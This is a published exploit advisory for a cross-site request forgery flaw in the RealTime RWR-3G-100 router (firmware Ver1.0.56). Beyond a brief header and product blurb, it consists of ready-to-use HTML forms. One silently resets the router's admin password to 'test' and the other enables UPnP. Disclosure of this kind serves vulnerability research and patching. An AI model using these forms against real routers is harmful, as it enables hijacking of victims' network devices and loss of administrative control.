RealTime RWR-3G-100 Router Cross Site Request Forgery
Posted on 15 August 2017
<!-- # Exploit Title: RealTime RWR-3G-100 Router Cross-Site Request Forgery (Change Admin Password) # Date: 13 Aug, 2017 # Vendor Homepage : http://www.rtsindia.com/ # Vendor Contact : https://www.linkedin.com/company/realtime-system-ltd. # Firmware Version : Ver1.0.56 # Exploit Author: Touhid M.Shaikh # Contact: https://github.com/touhidshaikh # Website: http://touhidshaikh.com/ =================== Product Description =================== Provides Wireless/ Wired Broadband connectivity to SOHO & SME. Provides Broadband connectivity to multiple users on the move.Uses 3G/2.75G USB Dongle to get connected to Broadband/ Optionally Uses Wired Broadband connectivity. Supports HSPA, EVDO, UMTS, HSDPA & HSUPA USB Dongles and Compatible with Blackberry & iPhone. Creates 802.11n Wi-Fi Hotspot for Multiple Users to get connected to Broadband. Small & Sleek Portable Router, Easy to Install & Manage. --> <!-- CHANGE ADMIN PASSWORD to test--> <form action=http://192.168.1.1/goform/formPasswordSetup method=POST name="password"> <input type="text" name="username" value="admin"> <input type="password" name="newpass" value="test"> <input type="password" name="confpass" value="test"> <input type="hidden" value="/status.asp" name="submit-url"> <input type="submit" value="Apply Changes" name="save"> <input type="reset" value=" Reset " name="reset" id="password Reset"> </form> <!-- CHANGE ADMIN PASSWORD Ends here--> <!---Enable The UPNP Service--> <form action=http://192.168.1.1/goform/formUpnpSetup method=POST name="upnpSetup"> <input type="radio" name="upnpfunction" id="upnpfunctiony" value="yes" checked> <input type="radio" name="upnpfunction" id="upnpfunctionn" value="no" > <!-- <input type="radio" name="avupnpfunction" id="avupnpfunctiony" value="yes" checked> <input type="radio" name="avupnpfunction" id="avupnpfunctionn" value="no" > --> <input type="submit" value="Apply Changes" name="save" id="upnp apply" > <input type="reset" value=" Reset " name="reset" id="upnp Reset"> <input type="hidden" value="/upnp.asp" name="submit-url"> </form> <!---Enable The UPNP Service Ends here--> <!-- ======GREEtZ===== my cool Broo and Pratik K.tjani -->